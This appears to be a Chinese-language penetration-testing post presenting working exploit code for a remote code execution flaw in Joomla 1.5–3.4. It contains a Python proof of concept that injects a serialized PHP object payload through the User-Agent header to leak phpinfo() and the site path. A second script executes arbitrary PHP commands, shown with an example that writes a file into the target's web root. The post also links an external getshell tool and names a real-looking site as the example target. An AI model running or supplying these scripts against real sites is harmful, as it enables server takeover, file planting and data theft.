Joomla 1.5-3.4 Remote Code Execution (exp)
[Penetration Testing]
poc
#!/usr/bin/python
# coding=utf-8
import urllib2
import cookielib
import sys
"""
python joomla.py http://example.com/
"""
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
urllib2.socket.setdefaulttimeout(10)
ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
req = urllib2.Request(url=sys.argv[1], headers={'User-Agent': ua})
opener.open(req)
req = urllib2.Request(url=sys.argv[1])
content = opener.open(req).read()
if 'SERVER["REMOTE_ADDR"]' in content:
print "vulnerable!"
print content
该poc会返回发送两个包,第二个包的回显中含有目标站点的phpinfo()数据,我们从中获取到网站的绝对路径.
exp
import requests
import re
import sys
url = sys.argv[1]
command = sys.argv[2]
"""
python exp.py http://www.schafx.de/ fputs\(fopen\(base64_decode\(L3Zhci93d3cvaHRtbC9hLnBocA\),w\),base64_decode\(PD9waHAgcGhwaW5mbygpID8\)\)
"""
def attack(uid):
headers = {
"User-Agent": '''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:%s:"%s;JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86''' % (len(command) + 28, command)
}
s = requests.session()
response = s.get(url='%s' % url, headers=headers)
response = s.get(url='%s' % url)
# response = s.post(url='%s' % url,data='a=')
info = response.content
return info
info = attack(url)
result = re.findall(r'</html>(.*)', info, re.S | re.I)
print result[0]
# print info
我们以上文获取到的绝对路径+xxx.php,并使用base64编码结果,构造payload,然后使用此py脚本发送之,即向指定的绝对路径写入文件.
php-exp
https://github.com/whirlwind110/joomla-getshell-EXP 成功率略低,还是手动吧